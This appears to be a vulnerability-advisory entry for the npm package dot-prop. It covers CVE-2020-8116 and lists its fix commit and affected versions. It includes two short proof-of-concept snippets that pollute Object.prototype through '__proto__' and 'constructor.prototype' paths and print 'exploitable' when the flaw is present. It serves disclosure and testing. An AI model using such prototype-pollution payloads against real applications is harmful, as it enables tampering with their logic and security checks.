Get, set, or delete a property from a nested object using a dot path
Latest version: 6.0.1
| CVE | Fix |
|---|---|
| CVE-2020-8116 | https://github.com/sindresorhus/dot-prop/commit/3039c8c07f6fdaa8b595ec869ae0895686a7a0f2 |
const dotProp = require('dot-prop');
dotProp.set({}, '__proto__.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 2.0.0 2.1.0 2.2.0 2.3.0 2.4.0 3.0.0 4.0.0 4.1.0 4.1.1 4.2.0 5.0.0 5.0.1 5.1.0
const dotProp = require('dot-prop');
dotProp.set({}, 'constructor.prototype.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 2.1.0 2.2.0 2.3.0 2.4.0 3.0.0 4.0.0 4.1.0 4.1.1 4.2.0 5.0.0 5.0.1 5.1.0